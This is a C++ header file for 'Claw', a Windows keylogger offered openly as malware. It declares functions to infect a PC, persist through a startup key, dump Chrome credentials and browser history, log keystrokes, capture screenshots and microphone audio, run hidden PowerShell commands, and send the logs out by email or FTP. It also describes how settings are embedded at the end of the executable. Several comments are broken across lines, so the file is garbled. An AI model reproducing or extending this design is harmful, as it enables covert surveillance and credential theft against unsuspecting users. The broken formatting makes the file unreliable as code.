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Author: Fahad (QuantumCore)

claw.h (c) 2020


#ifndef Claw_C
#define Claw_C

#include <algorithm>
#include <string>
#include <sstream>
#include <fstream>
#include <windows.h>
#include <limits>
#include <tchar.h>
#include <TlHelp32.h>
#include <shlobj.h>
#include <ctime>
#include <gdiplus.h>
#include <wininet.h>

#define UNLEN 256

// Threads

class Claw {

std::string DELIVERY_USER = ""; // the Delivery Username / Email

std::string DELIVERY_PASS = ""; // the Delivery Password
std::string FTP_SERVER = ""; // FTP Server (if used)
std::string INSTALL_NAME = ""; // The name to infect the pc as
std::string strTimeInterval = ""; // Time interval to send logs
std::string DELIVERY_METHOD = ""; // Delivery method, ftp or smtp
std::string MIC_OPTION = ""; // To Record Mic or not
std::string HQ = ""; // HQ is the Install location
std::string SCREENSHOTFILENAME; // 1st Screenshot filename
std::string SECONDSCREENSHOT; // 2nd Screenshot filename
std::string MICFILENAME; // Mic Recording filename

unsigned int TIME_INTERVAL = 0; // The time interval string, On line 39, is

later converted to unsigned int, Stored here.

std::string random_string( size_t length ); // returns random string

std::string initial_install_directory(); // Returns Initial Install directory
void copyFile(const char* source, const char* dest); // Copy file
void _infect(); // Infect the system
void StartupKey(const char* czExePath); // Add to Startup
std::string Dir(); // Get Current Directory
void replaceAll( std::string &s, const std::string &search, const std::string
&replace ); // This function is used
// To replace all instances of a string in an another string.
bool SendMail(std::string message, std::string subject); // Send Email
void split(char* src, char* dest[5], const char* delimeter) ; // Split
string, C style.
void ProcessDelivery(); // Log Delivery Processing
std::string MyLocation(); // Returns Location of Claw Keylogger
std::istream& ignoreline(std::ifstream& in, std::ifstream::pos_type& pos); //
ignores a line being read from a file.
std::string getLastLine(std::ifstream& in); // Gets the Last line of the file

Gets Keylogger Reqiured INFORMATION.

Information is written in the EXE at the End of File.

This function, Reads the last line and loads the information required.
Claw cannot run without it.
Information format : (protocol)[](server/email)[](password)[](install_name)[]
Example :

|- Sends Logs to Email on Infects the PC with name
|- Sends Logs every 5 Minutes, With Mic Recording.

|- Sends Logs to FTP on Infects the PC with name
|- Sends Logs every 5 Minutes, Without Mic Recording.
|- see claw.cpp line 399 for details on ftp innformaton parsing

This information is split into an array using '[]' as it's delimeter.

Delimeter can be changed, It should be something that must not be in any
other setting as it will be split too.
The current delimeter is recommended to not be changed.

Time Intervals that Claw uses are 300000ms (5 minutes), 600000ms (10
minutes), and 900000 (15 minutes)
std::string GetKeyLoggerInformation();
DWORD ProcessId(LPCTSTR ProcessName); // GET PID of a Process by Name
BOOL isFile(const char* file); // Check if a file exists, Returns TRUE if it
does, FALSE if it does not.
std::string readFileContents(const char* file); // Returns the contents of a
std::string ExecuteOutFile(const char* command, const char* output_filename);
// Execute a PS Command and Redirect output to file.
void ExecuteSilent(const char* command); // Execute a PS Command Silently
void ExecuteCommandPrompt(const char* command); // Execute a Command in CMD.
std::string DumpChromeCredentials(); // Dump Google Chrome Credentials
void DumpBrowserHistory(); // Dump Browser history
bool hookShift(); // Get shift status
bool capsLock(); // Get capslock status
int filter(int key); // Filters keys
void Keylogger(); // The Keylogger
std::string KeylogFileName(); // returns Keylogger filename
std::string WindowStamp(); // returns Window Name + Timestamp
void ScreenShot(std::string JPEG_FILENAME); // Takes Screenshot of the Entire
std::string WANIP(); // Returns WAN IP Address
std::string UserPC(); // Returns User / PC.
void RecordMic(); // Records Mic.

#endif // ! Claw

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